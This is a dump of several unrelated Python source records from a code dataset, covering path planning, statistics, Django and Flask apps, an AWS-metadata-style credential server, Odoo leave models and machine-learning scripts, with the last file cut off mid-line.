self.obstacles:\n if obstacle.contains(point):\n return False\n return True\n\n\n def get_random_point(self, rand_i):\n \"\"\"\n 获取随机点的x,y,z值\n :param random_i: 迭代次数\n :return: 坐标值\n \"\"\"\n x = self.minx + LeeHalton.halton(rand_i,2)*(self.maxx-self.minx)\n y = self.miny + LeeHalton.halton(rand_i,3)*(self.maxy-self.miny)\n z = self.minz + LeeHalton.halton(rand_i,4)*(self.maxz-self.minz)\n # x = self.minx + random.random() * (self.maxx - self.minx)\n # y = self.miny + random.random() * (self.maxy-self.miny)\n # z = self.minz + random.random() * (self.maxz-self.minz)\n return (x,y,z)\n\n def get_centroid(self,region):\n \"\"\"\n 功能:获取图形的形心\n :param region:图形\n :return: 图形形心\n \"\"\"\n centroid = region.centroid.wkt\n filtered_vals = centroid[centroid.find(\"(\")+1:centroid.find(\")\")]\n filtered_x = filtered_vals[0:filtered_vals.find(\"\")]\n filtered_y = filtered_vals[filtered_vals.find(\"\")+1:-1]\n filtered_z = filtered_vals[filtered_vals.find(\"\")+1:-1]\n (x,y,z) = (float(filtered_x),float(filtered_y),float(filtered_z))\n return (x,y,z)\n\n\n\n\n\n\n\n\n\n\n\n\n def isEdgeCollisionFree(self,point1,point2):\n \"\"\"\n # 连接两个点的直线中间是否经过障碍物,是否超出界限\n point1,point2 为要判断的两个点\n :param point1:\n :param point2:\n :return:\n \"\"\"\n # 判断point2是否超出了边界\n if self.isOutofBounds(point2):\n return False\n line = LineString([point1,point2])\n expanded_line = line.buffer(self.obj_radius,self.resolution)\n for obstacle in self.obstacles:\n if expanded_line.intersects(obstacle):\n return False\n return True\n\n\n def isOutofBounds(self,point):\n x = point[0]\n y = point[1]\n z = point[2]\n # obj_radius是对象半径,就是走这个路径的对象。这里考虑了实际情况\n if((x-self.obj_radius)self.maxx):\n return True\n if ((y+self.obj_radius)>self.maxy):\n return True\n if ((z+self.obj_radius)>self.maxz):\n return True\n return False\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"NewRRT/LeeRRT.py","file_name":"LeeRRT.py","file_ext":"py","file_size_in_byte":13920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31892452","text":"#coding=utf-8\nimport numpy as np;\nimport numpy.random as random;\nfrom scipy.stats import *\nif __name__=='__main__':\n #A = np.ones([5])\n #B = np.ones([4])\n A = random.rand(4,1);\n B = random.rand(4,1);\n #B = A+A;\n print(A,B)\n #result = ranksums(A,B)\n result = mannwhitneyu(A,B)\n print(result)\n print(result[1])","sub_path":"test/rank-sum-test.py","file_name":"rank-sum-test.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"186094666","text":"from django.conf.urls import url\n\nfrom purchases import views\n\nurlpatterns = [\n url(r'^$', views.ProductListView.as_view(), name='products'),\n url(r'product/(?P[-\\w]+)/$', views.ProductDetailView.as_view(), name='product_detail'),\n url(r'adding_sale', views.SaleAddingView.as_view(), name='adding_product_to_sale'),\n url(r'sales', views.SaleListView.as_view(), name='sales'),\n url(r'change_prices', views.ChangePriceListView.as_view(), name='change_prices'),\n]","sub_path":"purchases/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"430276119","text":"#################\n#### IMPORTS ####\n#################\n# import app modules\nfrom website import app, db\nfrom website.models import User, Fare\n# import flask modules\nfrom flask import Blueprint, render_template, request\n\n###################\n#### BLUEPRINT ####\n###################\nhome_blueprint = Blueprint(\n 'home', __name__,\n template_folder='templates'\n)\n\n#################\n#### LOGICAL ####\n#################\n@home_blueprint.route('/')\ndef home():\n users = User.query.all()\n fares = Fare.query.all()\n return render_template('index.html', title='index',\n users=users, fares=fares)\n","sub_path":"website/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"369497189","text":"# coding: latin-1\n###############################################################################\n# eVotUM - Electronic Voting System\n#\n# unblindSignature-app.py\n#\n# Cripto-7.3.1 - Commmad line app to exemplify the usage of unblindSignature\n# function (see eccblind.py)\n#\n# Copyright (c) 2016 Universidade do Minho\n# Developed by André Baptista - Devise Futures, Lda. (andre.baptista@devisefutures.com)\n# Reviewed by Ricardo Barroso - Devise Futures, Lda. (ricardo.barroso@devisefutures.com)\n#\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n###############################################################################\n\"\"\"\nCommand line app that receives Blind signature, Blind components and prDashComponents\nfrom STDIN and writes the unblinded signature to STDOUT.\n\"\"\"\n\nimport sys\nfrom eVotUM.Cripto import eccblind\n\n\ndef printUsage():\n print(\"Usage: python unblindSignature-app.py\")\n\ndef parseArgs():\n if (len(sys.argv) > 1):\n printUsage()\n else:\n main()\n\ndef showResults(errorCode, signature):\n print(\"Output\")\n if (errorCode is None):\n print(\"Signature: %s\" % signature)\n elif (errorCode == 1):\n print(\"Error: pRDash components are invalid\")\n elif (errorCode == 2):\n print(\"Error: blind components are invalid\")\n elif (errorCode == 3):\n print(\"Error: invalid blind signature format\")\n\ndef main():\n print(\"Input\")\n blindSignature = raw_input(\"Blind signature: \")\n blindComponents = raw_input(\"Blind components: \")\n pRDashComponents = raw_input(\"pRDash components: \")\n errorCode, signature = eccblind.unblindSignature(blindSignature, pRDashComponents, blindComponents)\n showResults(errorCode, signature)\n\nif __name__ == \"__main__\":\n parseArgs()\n","sub_path":"TPraticas/Aula3/BlindSignature/unblindSignature-app.py","file_name":"unblindSignature-app.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487502714","text":"import tensorflow as tf\n# assign_add 的作用 以及 每个操作节点的依赖关系\na = tf.Variable(1.0, name=\"a\")\na_plus_1 = tf.assign_add(a,1,name=\"a_plus\")\n# y = a_plus_1\nwith tf.control_dependencies([a_plus_1]):\n y = a\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n sess.run(init)\n print(a.eval())\n print(a_plus_1.eval())\n print(a.eval())\n print(\"--------------\")\n for i in range(5):\n print(y.eval())","sub_path":"day01/tensor_04.py","file_name":"tensor_04.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"118004654","text":"from __future__ import print_function\nimport tensorflow as tf\nfrom keras.callbacks import LambdaCallback\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking\nfrom keras.layers import LSTM\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.sequence import pad_sequences\nimport sys\nimport io\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_curve\nfrom matplotlib import pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nimport json\n\nimport math\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\n\nimport logging\n\nlogging.basicConfig(filename='prediction_1.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')\n\ndir_csv = '/home/ywang86/csv/'\ns3_s4_start_csv = 'yw_1115_min_s3_s4_positive_6m.csv'\ngrouped_diags = 'yw_1115_grouped_diags_withbilabel.csv'\nicd9_related_ckd = 'yw_icd9_list_ccs_49_50_156_157_158_161.csv'\nicd9_to_ccs = 'icd9_ccs_single_level_dx.csv'\nccs_binary = 'ccs_id_binary.csv'\nthre_ave_pa = 1\n\n\ndef csv_df(csv_name):\n\tcsv_dir = dir_csv + csv_name \n\tdf = pd.read_csv(csv_dir)\n\treturn df\n# select input features\n\ndf_s3_s4_start = csv_df(s3_s4_start_csv)\ndf_grouped_diags = csv_df(grouped_diags)\ndf_icd9_related_ckd = csv_df(icd9_related_ckd)\ndf_icd9_to_ccs = csv_df(icd9_to_ccs)\ndf_ccs_binary = csv_df(ccs_binary) \n\nlogging.critical('total number of patients is %s',df_s3_s4_start.shape[0])\n\n\ncls = df_s3_s4_start.columns.tolist()\n\ncls = df_grouped_diags.columns.tolist()\n\n\n# ----------------------- prepare data -----------------------------------------------------------------------\n# add label value \navg_duration = df_s3_s4_start['s3_s4_duration'].mean()\n\nlogging.critical(\"average duration from s3 to s4 is %s\", avg_duration)\n\nthreshold_durationg = thre_ave_pa * avg_duration\ndf_grouped_diags = df_grouped_diags.assign(bi_label=(df_grouped_diags.s3_s4_duration < threshold_durationg))\ndf_grouped_diags.fillna('[]',inplace=True)\n\ndf_grouped_diags['prncpal_group_list'] = df_grouped_diags.prncpal_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags2_group_list'] = df_grouped_diags.diags2_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags3_group_list'] = df_grouped_diags.diags3_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags4_group_list'] = df_grouped_diags.diags4_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags5_group_list'] = df_grouped_diags.diags5_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags6_group_list'] = df_grouped_diags.diags6_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags7_group_list'] = df_grouped_diags.diags7_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags8_group_list'] = df_grouped_diags.diags8_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags9_group_list'] = df_grouped_diags.diags9_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags10_group_list'] = df_grouped_diags.diags10_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags11_group_list'] = df_grouped_diags.diags11_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags12_group_list'] = df_grouped_diags.diags12_group.apply(lambda x: x[1:-1].split(','))\n\ndf_grouped_diags['diags_all'] = df_grouped_diags.prncpal_group_list +df_grouped_diags.diags3_group_list+df_grouped_diags.diags4_group_list+df_grouped_diags.diags5_group_list+df_grouped_diags.diags6_group_list+df_grouped_diags.diags7_group_list+df_grouped_diags.diags8_group_list+df_grouped_diags.diags9_group_list+df_grouped_diags.diags10_group_list+df_grouped_diags.diags11_group_list+df_grouped_diags.diags12_group_list ;\n\n\n# Filter out diags after start of s3\ndf_grouped_diags['yearmonth'] = df_grouped_diags.min_dt_s3.apply(lambda x: x.split('-'))\n\n\n\ndf_grouped_diags['year_s3'] = df_grouped_diags['yearmonth'].apply(lambda x: int(x[0]))\ndf_grouped_diags['month_s3'] = df_grouped_diags['yearmonth'].apply(lambda x: int(x[1]))\n\n\n\n\ndf_grouped_diags_s3_history = df_grouped_diags[(df_grouped_diags['year_s3'] >= df_grouped_diags['yearno']) & (df_grouped_diags['month_s3']>= df_grouped_diags['monthno'])]\n\n\n\ndf_all_diags_s3_history = df_grouped_diags_s3_history.groupby('dsysrtky',as_index=False).agg({'diags_all':'sum', 'min_dt_s3': 'max', 's3_s4_duration': 'max', 'bi_label': 'max'})\n\n\n# remove empty diag \ndf_all_diags_s3_history['diags_all_noduplicate'] = df_all_diags_s3_history.diags_all.apply(lambda x: list(filter(None,list(set(x)))))\n\nlogging.critical(df_all_diags_s3_history.head(10))\nlogging.critical(df_all_diags_s3_history.columns.tolist())\n\n# ----------------------- end of prepare data -----------------------------------------------------------------------\n\n\n# generate codebook\n\nlist_icd_ccs = df_icd9_related_ckd.icd9.tolist() + df_ccs_binary.ccs.tolist() + ['naccs'] # add a naccs for the icd that doesn't have and available ccs \ndf_codebook = pd.DataFrame({'code':list_icd_ccs})\ndf_codebook['index_col'] = df_codebook.index\n\n\ndf_icd9_to_ccs.set_index('icd9')\n\n# dict_icd9_ccs = df_icd9_to_ccs.set_index('icd9').T.to_dict('list')\n\ndict_icd9_ccs = dict(zip(df_icd9_to_ccs.icd9, df_icd9_to_ccs.ccs))\n\ndict_codebook = dict(zip(df_codebook.code, df_codebook.index_col))\n\n\ndef icd_convert(diag_list, dict_codebook,dict_icd9_ccs):\n\tconverted_diag = [0] * len(dict_codebook)\n\tfor diag in diag_list:\n\t\tif diag in df_codebook.code.tolist():\n\t\t\tcode = dict_codebook[diag]\n\t\telse:\n\t\t\tccs_code = dict_icd9_ccs.get(diag) \n# \t\t\tccs_code = df_icd9_to_ccs.loc(df_icd9_to_ccs['icd9'] == diag)\n\t\t\tif ccs_code is None:\n\t\t\t\tcode = dict_codebook['naccs']\n\t\t\telse: \n\t\t\t\tcode = dict_codebook[ccs_code]\n\n\t\tconverted_diag[code] = 1\n\treturn converted_diag\n\ndf_all_diags_s3_history['ccs_binary'] = df_all_diags_s3_history.diags_all_noduplicate.apply(lambda x: icd_convert(x,dict_codebook,dict_icd9_ccs))\n\t\t\t\n\t\t\t\nlogging.critical(\"start training\")\n\ntr, ts = train_test_split(df_all_diags_s3_history)\n\n\ndf_s1 = tr['ccs_binary']\ndf_s2 = tr[['bi_label']]\n\ntest_s1 = ts['ccs_binary']\ntest_s2 = ts[['bi_label']]\n\narray_s1 = np.array(df_s1.values.tolist())\narray_s2 = df_s2.values\n\n\ntest_array_s1 = np.array(test_s1.values.tolist())\ntest_array_s2 = test_s2.values\n\nlogging.critical(array_s1)\n# fit model\n#clf = MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(5, 8), random_state=1)\nclf = MLPClassifier(activation='relu', alpha=1e-05, batch_size='lbfgs',beta_1=0.9, beta_2=0.999, early_stopping=False,epsilon=1e-08, hidden_layer_sizes=(7, 4), learning_rate='constant',learning_rate_init=0.001, max_iter=10000, momentum=0.9,nesterovs_momentum=True, power_t=0.5, random_state=1, shuffle=True,solver='lbfgs', tol=0.0001, validation_fraction=0.1, verbose=False,warm_start=False)\nclf.fit(array_s1, array_s2) \n\nlogging.critical(\"finished training\")\n\n\npredicted_result = clf.predict(array_s1)\npredicted_prob = clf.predict_proba(array_s1)\n\nlogging.critical(\"sum of predition is: %s\",sum(predicted_result))\nlogging.critical(\"sum of real result is: %s\",sum(array_s2))\n\nerror_num_1 = 0\nerror_num_0 = 0\n\nfor i in range(len(array_s2)):\n if (predicted_result[i]!= array_s2[i]) and (array_s2[i] == 1):\n error_num_1 = error_num_1 + 1\n elif (predicted_result[i]!= array_s2[i]) and (array_s2[i] == 0):\n \terror_num_0 = error_num_0 + 1\n #logging.critical(\"predict\",i, \" wrong, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\n #elif predicted_result[i] == 1:\n # logging.critical(\"predict\", i, \" right, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\naccuracy_score = clf.score(array_s1, array_s2, sample_weight=None)\nlogging.critical(\"accuracy_score is: %s\",accuracy_score)\nlogging.critical(\"1-recall is %s\", error_num_1/len(array_s2))\nlogging.critical(\"1-precision is %s\", error_num_0/len(array_s2)) \nlogging.critical(\"high use rate is %s\", sum(array_s2)/len(array_s2))\n \n\n\nlogging.critical('**********auc analysis***********')\n\nprobs = clf.predict_proba(array_s1)\nfpr, tpr, thresholds = roc_curve(array_s2, probs[:,1])\nauc_rf = auc(fpr,tpr)\n\nlogging.critical('auc for logistic regression is %s',auc_rf)\n\n\n\nlogging.critical('******************** TEST PART************************')\npredicted_result = clf.predict(test_array_s1)\npredicted_prob = clf.predict_proba(test_array_s1)\n\nlogging.critical(\"sum of predition is: %s\",sum(predicted_result))\nlogging.critical(\"sum of real result is: %s\",sum(test_array_s2))\n\nerror_num_1 = 0\nerror_num_0 = 0\n\nfor i in range(len(test_array_s2)):\n if (predicted_result[i]!= test_array_s2[i]) and (test_array_s2[i] == 1):\n error_num_1 = error_num_1 + 1\n elif (predicted_result[i]!= test_array_s2[i]) and (test_array_s2[i] == 0):\n \terror_num_0 = error_num_0 + 1\n #logging.critical(\"predict\",i, \" wrong, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\n #elif predicted_result[i] == 1:\n # logging.critical(\"predict\", i, \" right, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\naccuracy_score = clf.score(test_array_s1, test_array_s2, sample_weight=None)\nlogging.critical(\"accuracy_score is: %s\",accuracy_score)\nlogging.critical(\"1-recall is %s\", error_num_1/len(test_array_s2))\nlogging.critical(\"1-precision is %s\", error_num_0/len(test_array_s2)) \nlogging.critical(\"high use rate is %s\", sum(test_array_s2)/len(test_array_s2))\n\n \n\n\nlogging.critical('**********auc analysis***********')\n\nprobs = clf.predict_proba(test_array_s1)\nfpr, tpr, thresholds = roc_curve(test_array_s2, probs[:,1])\nauc_rf = auc(fpr,tpr)\n\nlogging.critical('auc for logistic regression is %s',auc_rf)","sub_path":"hap880/Code/stage_prediction.py","file_name":"stage_prediction.py","file_ext":"py","file_size_in_byte":9903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51595802","text":"# STU dataset\nimport os.path as osp\nimport mmcv\nimport numpy as np\nimport natsort\nimport glob\n\nfrom .custom import CustomDataset\nfrom .registry import DATASETS\n\n@DATASETS.register_module\nclass MatSTUDataset(CustomDataset):\n '''\n # custom dataset for .mat\n '''\n CLASSES = ('person',)\n\n def __init__(self, **kwargs):\n super(MatSTUDataset, self).__init__(**kwargs)\n\n def load_annotations(self, ann_file):\n # store the annnotation\n self.bboxes = mmcv.load( ann_file )\n\n if not self.test_mode:\n img_names = sorted(glob.glob( osp.join('data', \"detection_test_data\",\"*.jpg\") ))\n else:\n img_names = sorted(glob.glob(osp.join('data/detection_data', \"detection_real_test_data\",\"*.jpg\")))\n\n def dir2dict(filedir):\n # all 1024 * 768 * 3\n return dict(filename=filedir, width=1024, height=768)\n\n img_infos = list(map(lambda x: dir2dict(x), img_names))\n\n assert( len(self.bboxes) == len(img_infos) )\n\n return img_infos\n\n def get_ann_info(self, idx):\n bboxes = np.array(self.bboxes[idx], ndmin=2) - 1\n labels = np.ones(len(bboxes))\n # no bboxes_ignore\n bboxes_ignore = np.zeros((0, 4))\n labels_ignore = np.zeros((0,))\n\n ann = dict(\n bboxes=bboxes.astype(np.float32),\n labels=labels.astype(np.int64),\n bboxes_ignore=bboxes_ignore.astype(np.float32),\n labels_ignore=labels_ignore.astype(np.int64)\n )\n\n return ann\n\n","sub_path":"mmdet/datasets/mat_style.py","file_name":"mat_style.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546255560","text":"n=int(input())\r\nl=list(map(int,input().split()))\r\nl2=[]\r\nwhile l!=[]:\r\n l.sort()\r\n l1=[]\r\n i=0\r\n while i getattr(self, \"_basic_auth_time\", datetime.utcnow()) + timedelta(hours=4):\n self._basic_auth = None\n return getattr(self, \"_basic_auth\", None)\n\n @basic_auth.setter\n def basic_auth(self, val):\n self._basic_auth = val\n self._basic_auth_time = datetime.utcnow()\n\n @property\n def keys(self):\n keys = getattr(self, \"_keys\", None)\n if keys is not None:\n expiration = parse_ts(keys[\"Expiration\"])\n if datetime.utcnow() > expiration:\n log.info(\"Keys expired, recreating them\")\n keys = None\n\n if keys is None:\n log.info(\"Assuming role\")\n pair = IamSaml(self.credentials.keys.provider, self.credentials.keys.idp_username, \"\")\n pair.basic_auth = self.basic_auth\n keys = pair.get_result(self.credentials.keys.role).credentials.to_dict()\n\n self._keys = {\n \"Code\": \"Success\"\n , \"LastUpdated\": datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S:00Z\")\n , \"AccessKeyId\": keys[\"access_key\"]\n , \"SecretAccessKey\": keys[\"secret_key\"]\n , \"Token\": keys[\"session_token\"]\n , \"Expiration\": keys[\"expiration\"]\n }\n return self._keys\n\n @keys.setter\n def keys(self, val):\n self._keys = val\n\n @property\n def app(self):\n try:\n from flask import Flask\n except ImportError:\n raise CredoError(\"Please pip install flask\")\n\n if getattr(self, \"_app\", None) is None:\n self._app = Flask(\"credo.server\")\n self.register_routes(self._app)\n return self._app\n\n def register_routes(self, app):\n from flask import jsonify, abort, make_response, request\n\n @app.route('/', methods = ['GET'])\n def index():\n return 'latest'\n\n @app.route('/latest/', methods = ['GET'])\n def latest():\n return 'meta-data'\n\n @app.route('/latest/meta-data/', methods = ['GET'])\n def meta_data():\n return 'iam\\nswitch'\n\n @app.route('/latest/meta-data/switch/', methods = [\"POST\"])\n def switch():\n if not request.data:\n return make_response(jsonify({\"error\": \"Need post data\"}), 500)\n obj = pickle.loads(request.data)\n basic_auth = obj.get(\"basic_auth\", self.basic_auth)\n credentials = obj[\"credentials\"]\n\n if basic_auth is None:\n return make_response(jsonify({\"error\": \"NEED_AUTH\"}), 500)\n else:\n self.basic_auth = basic_auth\n self.credentials = credentials\n self.keys = None\n\n # keys is a property that actually gets the credentials\n try:\n self.keys\n except SamlNotAuthorized:\n return make_response(jsonify({\"error\": \"BAD_PASSWORD\"}), 500)\n return \"success\"\n\n @app.route('/latest/meta-data/iam/', methods = ['GET'])\n def iam():\n return 'security-credentials'\n\n @app.route('/latest/meta-data/iam/security-credentials/', methods = ['GET'])\n def security_credentials():\n return 'BaseIAMRole'\n\n @app.route('/latest/meta-data/iam/security-credentials/BaseIAMRole', methods = ['GET'])\n def base_iam_role():\n if self.credentials is None or self.basic_auth is None:\n return make_response(jsonify({\"error\": \"DO SWITCH\"}), 500)\n return jsonify(self.keys)\n\n @app.errorhandler(400)\n def not_found(error):\n return make_response(jsonify({'error': 'bad request'}), 400)\n\n @app.errorhandler(404)\n def not_found(error):\n return make_response(jsonify({'error': 'not found'}), 404)\n\n @app.errorhandler(500)\n def not_found(error):\n return make_response(jsonify({'error': 'internal server error'}), 500)\n\n","sub_path":"credo/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486384235","text":"import sys\nfrom flask import Flask, request, render_template\nimport psycopg2\nimport dj_database_url\nfrom helpers import mysearch, redditsearch\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n@app.route(\"/\")\ndef hello():\n return render_template('index.html')\n\n@app.route(\"/feedback\")\ndef feedback():\n direction = int(request.args['dir'])\n who = int(request.args['who'])\n id = int(request.args['id'])\n\n conn = connect_db()\n cur = conn.cursor()\n\n if direction == 1 and who == 0:\n cur.execute(\"update search set reddit_relevant = reddit_relevant + 1 where id = %s\", [id])\n elif direction == 0 and who == 0:\n cur.execute(\"update search set reddit_irrelevant = reddit_irrelevant + 1 where id = %s\", [id])\n elif direction == 1 and who == 1:\n cur.execute(\"update search set mine_relevant = mine_relevant + 1 where id = %s\", [id])\n elif direction == 0 and who == 1:\n cur.execute(\"update search set mine_irrelevant = mine_irrelevant + 1 where id = %s\", [id])\n\n conn.commit()\n\n return 'OK'\n\n@app.route(\"/s\")\ndef search():\n query = request.args['q']\n \n conn = connect_db()\n cur = conn.cursor()\n\n myresult = mysearch(query, cur)\n redditresult = redditsearch(query, cur)\n\n cur.execute(\"insert into search (query, num_results_reddit, num_results_mine) values (%s, %s, %s) returning id;\", [query, len(redditresult), len(myresult)])\n searchid = cur.fetchone()[0]\n conn.commit()\n\n return render_template('result.html', result1=redditresult, result2=myresult, searchid=searchid) \n\n\ndef connect_db():\n db = dj_database_url.config()\n return psycopg2.connect(database=db.get('NAME', 'redditsearch2'), user=db.get('USER', 'andrew'), password=db.get('PASSWORD', 'password'), host=db.get('HOST', 'localhost'))\n\nif __name__ == \"__main__\":\n app.run(debug=True,port=int(sys.argv[1]), host='0.0.0.0')\n","sub_path":"redditsearch.py","file_name":"redditsearch.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"498338726","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api\n\n\nclass HrHolidays(models.Model):\n _inherit = 'hr.holidays'\n _description = \"Holidays\"\n\n expected_rejoining_date = fields.Datetime(string=\"Expected rejoining date\", readonly=True,\n states={'draft': [('readonly', False)], 'confirm': [('readonly', False)]}, track_visibility='onchange')\n actual_rejoining_date = fields.Datetime(string=\"Actual rejoining date\", track_visibility='onchange')\n\n edit_by_hr = fields.Boolean(compute='_compute_can_edit_name')\n\n def _compute_can_edit_name(self):\n for rec in self:\n edit_only_by_hr = False\n group_hr_holidays_manager = self.env.user.has_group('hr_holidays.group_hr_holidays_manager')\n group_hr_holidays_user = self.env.user.has_group('hr_holidays.group_hr_holidays_user')\n if not group_hr_holidays_manager or not group_hr_holidays_user:\n edit_only_by_hr = False\n if group_hr_holidays_manager or group_hr_holidays_user:\n if rec.state in ('draft', 'confirm'):\n edit_only_by_hr = True\n rec.edit_by_hr = edit_only_by_hr\n\n allocation_date = fields.Date(default=fields.Date.today, help=\"Leave allocated date\", track_visibility='onchange')\n allocation_range = fields.Selection([('year', 'Yearly'), ('month', 'Monthly')],\n 'Leave frequency',\n help=\"Periodicity on which you want automatic allocation of leaves to \"\n \"eligible employees.\", track_visibility='onchange')\n\n @api.onchange('date_to')\n def _onchange_date_to(self):\n \"\"\" Update Expected rejoining date. \"\"\"\n res = super(HrHolidays, self)._onchange_date_to()\n self.expected_rejoining_date = self.date_to\n\n holidays_ext_id = fields.Many2one('hr.holidays', string='Extended from leave')\n extended_ids = fields.One2many('hr.holidays', 'holidays_ext_id', string='Extended Leaves')\n\n is_carry_forward_leave = fields.Boolean('Carry forward', track_visibility='onchange')\n date_carry_forward = fields.Date('Leave Expiry Date', track_visibility='onchange')\n\n @api.onchange('holiday_status_id')\n def _onchange_holiday_status_id(self):\n self.is_carry_forward_leave = self.holiday_status_id.is_carry_forward_leave\n","sub_path":"Medical_09122019/hr_leaves_solution/models/leave.py","file_name":"leave.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389977948","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils, models\nfrom sklearn.model_selection import train_test_split\nimport skimage\nimport skimage.io\nfrom pandas import Series\nimport os\nimport skimage.transform\nfrom PIL import Image\nfrom time import time\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\n\ndata_dir = '../input'\nimg_dir = os.path.join(data_dir, 'bee_imgs')\ndata_csv = os.path.join(data_dir, 'bee_data.csv')\ndata = pd.read_csv(data_csv)\n\n\n#set subspecies\ntarget = data['subspecies']\ntarget = Series.as_matrix(target)\ntarget_list = set(target)\ntarget_list = list(target_list)\n\ndic = {}\nfor i in range(7):\n dic[target_list[i]] = i\ndata = data.replace({\"subspecies\": dic})\n\n#define dataset\n\nclass honeybee(Dataset):\n def __init__(self, data, transform = None):\n self.data = data\n self.img_dir = '../input/bee_imgs'\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n def __getitem__(self, index):\n img = os.path.join(self.img_dir, self.data.iloc[index,0])\n image = Image.open(img)\n image = image.resize((120,120))\n image = image.convert('RGB')\n image = self.transform(image)\n label = np.asarray(self.data.iloc[index, 5]) # type: object\n\n return image,label\n\n def __len__(self):\n return len(self.data)\n\n\n# split train test\ntrain, test = train_test_split(data, test_size=0.3)\ntrain_data = honeybee(train)\ntest_data = honeybee(test)\n\n\nepochs = 30\nbatch_size = 64\nlearning_rate = 0.001\n\n#Data Loader\ntrain_loader = torch.utils.data.DataLoader(dataset=train_data, batch_size=batch_size,shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_data, batch_size=batch_size, shuffle=False)\n\n# CNN Model\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 32, kernel_size=3, stride= 1, padding=2), # RGB image channel = 3, output channel = num_filter\n nn.ReLU(),\n nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=2),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Dropout(p=0.5)) #output size (16,61,61)\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=3, stride= 1, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2), #output size (32,32,32)\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=2),\n nn.ReLU(),\n nn.Dropout(p=0.5)\n ) #output size (64,34,34)\n\n self.layer3 = nn.Sequential(\n nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2),\n nn.Dropout(p=0.5))\n #output size(128,18,18)\n\n self.layer4 = nn.Sequential(\n nn.Linear(128*18*18, 256),\n nn.Linear(256, 128),\n nn.Linear(128, 7)\n )\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = out.view(out.size(0), 